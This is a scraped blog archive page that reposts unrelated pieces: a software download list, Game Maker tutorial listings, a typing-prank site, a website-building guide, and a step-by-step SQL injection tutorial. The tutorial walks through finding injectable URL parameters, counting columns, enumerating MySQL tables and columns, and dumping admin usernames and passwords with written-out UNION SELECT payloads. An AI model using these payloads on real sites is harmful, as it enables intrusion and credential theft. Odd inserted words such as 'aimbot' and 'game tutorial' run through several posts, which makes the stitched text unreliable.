Calendario

Diciembre. 2015
LunMarMierJueVierSabDom
 << <Jun 2017> >>
 123456
78910111213
14151617181920
21222324252627
28293031   

Anuncio

¿Quién está en línea?

Miembro: 0
Visitantes: 2

rss Sindicación

Anuncio de los artículos posteados el: 01/01/2001

05 Mar 2016 

Website Hacking - HackersOnlineClub

SQL Injection in MySQL Databases:-

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:

www.site.com/page=1

or

www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this game tutorial using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:



www.site.com/page=1 order by 1--

order by 2--

order by 3--

order by 4--

order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,

for example:

www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:

user()

database()

version()

or if these dont work try...

@@user

@@version

@@database

For example the url would look like:

www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example [email protected] and MySQL 5.0.83.

IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.

UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

So the url would look like:

www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6

In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

So the url would look like this:

www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,

union all select 1,2,group_concat(username,0x3a,password),4 from admin--

So the url would look like this:

www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

Admin · 13933 vistas · Escribir un comentario
27 Feb. 2016 

LO4D.com - Free Software Downloads

Free

Phone

Odin3 3.10.7

Allows you to update your Android firmware without fuss

Free

Components

DirectX 10

A new version of Microsoft DirectX 11 for Windows Vista

Free

Phone

iTools 3.2.1

Easily synchronize data between your PC and Apple iOS device

Free

Phone

Samsung Tool 20.5

Repair damage and perform unlocking on Samsung Android devices

Free

Components

DirectX 9.0c

Update package from Microsoft that updates the installation of DirectX to 9.0c runtime which many modern games require

Free

Components

DirectX 11

DirectX runtime for Vista and higher

Free

Video Player

QQ Player 3.9.934

A video player which can play most popular video and audio formats including Flash video

Free

Anonymizer

Psiphon 3.0

Anti-censorship proxy solution for Windows and Android while bypassing region restrictions and national firewalls

Free

CD/DVD

XBOX 360 ISO Extract 0.6

Tools to pack and extract ISO image files for the Xbox 360 console for backing up game discs



Admin · 15414 vistas · Escribir un comentario
20 Feb. 2016 

YoYo Games | Tutorials

To learn more about the creation of particular types of games a number of tutorials are available on this page. All tutorials have been rewritten for version 8 of Game Maker. They all contain a text document in pdf format, a number of example games, and often additional sprites and sounds.

Your First Game



Tutorial: Your First Game (zip file, 850 KB)

This tutorial is meant for people that have problems getting started with Game Maker. In very precise steps it helps you create your first game.

Beginner.

Creating a Scrolling Shooter

Tutorial: Creating a Scrolling Shooter (zip file, 1.8 MB)

This extensive tutorial shows you how to create a scrolling shooter. It also treats a number of aspects of Game Maker like the use of variables, views, and time lines.

Beginner.

Maze Games

Tutorial: Maze Games (zip file, 1.4 MB)

This tutorial shows you how to create a simple maze game. It treats such aspects as how to make a character move from cell to cell, how to display the score and the lives, how to create monsters, and how to add all sorts of special features like movable blocks.

Beginner.

Platform Games

Tutorial: Platform Games (zip file, 1.6 MB)

This microsoft windows tutorial shows you how to create a simple platform game. It treats such aspects as how to make a character jump and land, how to crush monsters when the character jumps on top of them, and how to use tiled backgrounds for creating appealing graphics.

Intermediate.

3 Dimentional Games

Tutorial: 3-Dimensional Games (zip file, 1.1 MB)

This tutorial shows you how to create games with a 3-dimensional look. It discusses parallax scrolling, the use of depth and image scaling and how to create isometric games. It shows that Game Maker is more powerful than you might think and is not really limited to 2-dimensional games.

Intermediate.

Multiplayer Games

Tutorial: Multiplayer Games (zip file, 210 KB)

This tutorial shows you how to create a multiplayer game. It shows how to set up a connection, how to create game sessions and how to communicate between the games. Two examples are given: a two-player pong game and a simple chat program. This is an advanced tutorial and requires coding experience in GML. It also requires a pro version of the program.

Advanced.

Admin · 14112 vistas · Escribir un comentario
13 Feb. 2016 

GEEKTyper.com - Be The One



GEEKTyper.com - Be The OneMAINWHAT IS ITABOUTDOWNLOADPress F11, select a theme and start typing:

Tegnio (Customizable)



SHIELD Version



SCP



Umbrella Corp



Aperture Science



Combine



Black Mesa



Plain Terminal



Matrix



Dharma



Sliv



MLP Typer



Microsoft Word



Visual Studio



LOLCODE



HE-MAN



Braile Version



Alien Version



Fallout Version



GeekTyper Blue



Writer

Suggest a theme



We rely on ads to host this site, please consider whitelisting it if you like it! :)

Admin · 15111 vistas · Escribir un comentario
06 Feb. 2016 

How to Build a Website

Some of us have blogs and some of us have personal webpages, but the bread and butter of the World Wide Web is the websitethat is, a collection of related webpages filled with data, media content, and often ecommerce options, all found at the same domain name. When you think of the Web, you're generally conceiving of a collection of millions of websites.



If you need a website your options to build one are almost endless. You can hire someone to design and code it, or try your own hand. Work with a company that hosts your pages, or aimbot find a Web service that also hosts. Use an online service to create pages, or a third-party software tool. Or if you're truly a gearhead, use a plain text editor to create a site from scratch. How you mix and match these decisions depends on your skills, time, budget, and gumption. None of them are wrong, but some can be very right.



We're here to give you a cursory introduction to services and software that can get you started building your own website, even if you have no experience at all. Keep in mind, none of these tools will give you an idea for a winning websitethat's on you. They also won't make you a Web designer; a job that can be very distinct from building a site. Still, these sites, services, and software will ease some of the headaches that come from a lack of extensive expertise in HTML, CSS, and FTP.



A blog is a unique subset of website thanks to its familiar layout: new content sits on the top of the page, scrolling down reveals older posts, and older archived content links off to another page. When someone needs to build a website quickly, a blogging service is typically easy and fast. (At least, it's meant to be.)



The big names in the business are Blogger (4.5 stars) and WordPress.com (4.5 stars). Both are PCMag Editors' Choices because they are incredibly easy to set up, customize, and use on a daily basis. Both offer site hosting so you never have to learn FTP tricks, however you are usually limited to their design options.





By adjusting how you use Blogger or WordPress archives you can make new webpages for each entry. If your site is a catalog of products, then each product becomes a new entry. In Blogger, you can then enter Settings, select "Show at most 1 post on the main page," and you'll get a new page for each post. Tracking the URL for each is as simple as visiting your blog's "Posts" section to find them; you can then create links to those pages as needed. Sites created on Blogger and WordPress are typically mobile-friendly the minute they launch and are usually free, but it will usually cost cash to set up a domain name that works with the site.



Yahoo's Tumblr is another incredibly popular blog platform that lends itself to shorter, more visual posts. You can however find themes that give you a more "website-y" feel; there are instructions out there to modify a Tumblr theme for this purpose. Being a little more involved, it's not going to get your new site up and running quite as quick.



Newer blogging services like Anchor, Feathers, or Medium stress the writing and publishing over cohesiveness, but sure are easy to use.



Admin · 21806 vistas · Escribir un comentario

Página precedente  1, 2, 3 ... , 9, 10, 11  Página siguiente